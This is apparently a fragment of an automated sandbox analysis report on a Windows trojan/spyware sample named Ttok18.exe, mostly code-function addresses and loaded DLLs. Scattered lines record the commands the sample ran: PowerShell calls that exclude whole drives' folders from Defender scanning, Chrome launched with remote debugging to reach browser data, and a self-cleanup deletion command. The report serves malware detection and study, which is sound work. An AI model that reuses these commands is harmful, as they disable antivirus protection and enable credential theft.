            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042B32115_2_0042B321
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D3C115_2_0042D3C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D3D115_2_0040D3D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041338115_2_00413381
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F3B115_2_0040F3B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044343115_2_00443431
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004434F115_2_004434F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F48115_2_0043F481
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004094A115_2_004094A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B4A115_2_0040B4A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041356115_2_00413561
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040956115_2_00409561
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D50115_2_0040D501
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041151115_2_00411511
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B5E115_2_0040B5E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F59115_2_0040F591
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F59115_2_0043F591
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044359115_2_00443591
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D5B115_2_0040D5B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F65115_2_0043F651
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044367115_2_00443671
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041360115_2_00413601
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041162115_2_00411621
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F63115_2_0040F631
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D6C115_2_0042D6C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D6E115_2_0040D6E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F6F115_2_0043F6F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B68115_2_0040B681
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042B69115_2_0042B691
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004096B115_2_004096B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041174115_2_00411741
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F74115_2_0040F741
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044374115_2_00443741
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041371115_2_00413711
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B7C115_2_0040B7C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F7E115_2_0043F7E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004437E115_2_004437E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F7F115_2_0040F7F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004097B115_2_004097B1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D80115_2_0040D801
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F8C115_2_0040F8C1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004098D115_2_004098D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F8D115_2_0043F8D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040B8E115_2_0040B8E1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D8F115_2_0040D8F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042D8F115_2_0042D8F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041188115_2_00411881
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004438A115_2_004438A1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041396115_2_00413961
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043F97115_2_0043F971
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004119D115_2_004119D1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004139F115_2_004139F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040D9F115_2_0040D9F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004099F115_2_004099F1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040F98115_2_0040F981
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0044398115_2_00443981
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411A7115_2_00411A71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BA0115_2_0040BA01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FA0115_2_0043FA01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042DA0115_2_0042DA01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042DAC115_2_0042DAC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BAF115_2_0040BAF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409A8115_2_00409A81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FAA115_2_0043FAA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BAA115_2_0042BAA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00413B0115_2_00413B01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DB0115_2_0040DB01
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411B3115_2_00411B31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411BD115_2_00411BD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DBD115_2_0040DBD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00413BE115_2_00413BE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BB8115_2_0040BB81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409BA115_2_00409BA1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BBB115_2_0042BBB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BC5115_2_0042BC51
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411C7115_2_00411C71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BC7115_2_0040BC71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040FC3115_2_0040FC31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409CC115_2_00409CC1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DC8115_2_0040DC81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FC9115_2_0043FC91
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00413D1115_2_00413D11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BD1115_2_0040BD11
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DD3115_2_0040DD31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FD3115_2_0043FD31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DDD115_2_0040DDD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FDD115_2_0043FDD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BDE115_2_0042BDE1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409DF115_2_00409DF1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00403D8115_2_00403D81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411D9115_2_00411D91
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BDB115_2_0040BDB1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043FE6115_2_0043FE61
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00411E3115_2_00411E31
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042BED115_2_0042BED1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BE8115_2_0040BE81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DE8115_2_0040DE81
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00447F4F15_2_00447F4F
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040BF7115_2_0040BF71
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040DFD115_2_0040DFD1
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00409FA115_2_00409FA1
            Source: Ttok18.exe, 00000000.00000002.1995156479.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Ttok18.exe
            Source: Ttok18.exe, 00000000.00000000.1691573662.0000000000992000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQwest.exe, vs Ttok18.exe
            Source: Ttok18.exe | Binary or memory string: OriginalFilenameQwest.exe, vs Ttok18.exe
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@41/51@6/7
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Code function: 15_2_0043226F CreateToolhelp32Snapshot,Process32First
            Source: C:\Users\user\Desktop\Ttok18.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ttok18.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvsmxirt.zf5.ps1
            Source: Ttok18.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Ttok18.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Ttok18.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Ttok18.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: AASR9H47Q.15.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Ttok18.exe | ReversingLabs: Detection: 18%
            Source: unknown | Process created: C:\Users\user\Desktop\Ttok18.exe "C:\Users\user\Desktop\Ttok18.exe"
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe"
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
            Source: C:\Users\user\Desktop\Ttok18.exe | Process created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2180,i,4947375458311631145,18082190832004734882,262144 /prefetch:8
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\Ttok18.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
